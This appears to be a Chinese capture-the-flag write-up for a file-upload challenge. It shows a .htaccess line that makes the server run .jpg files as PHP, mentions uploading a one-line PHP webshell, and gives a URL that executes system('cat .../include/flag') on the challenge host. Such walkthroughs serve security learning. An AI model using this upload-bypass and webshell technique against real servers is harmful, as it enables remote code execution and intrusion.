考点:文件上传(.htaccess / html解析php)
解题思路:
这道题其实不算是真实环境中的文件上传类型,纯粹只是想一道题里多夹杂几个文件上传的考点而已~导致一开始那个输入框都以为是SQL题,然后就卡在绕过上了:( 但是提示应该也很明显是f* put content
http://222.18.158.227:20060/?text[]=aaa
上传.htaccess
AddType application/x-httpd-php .jpg
然后在写一句话木马
上传后,用hackbar查看文件名
http://222.18.158.227:20060/uploads/20191126214300_1.jpg?abc=system(“cat …/include/flag”);
.htaccess原理:
看一下百度对htaccess的理解
概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。
我个人理解的意思就是,把SetHandler application/x-httpd-php 这句话写成.htaccess,然后上传个jpg,它就当php解析了.
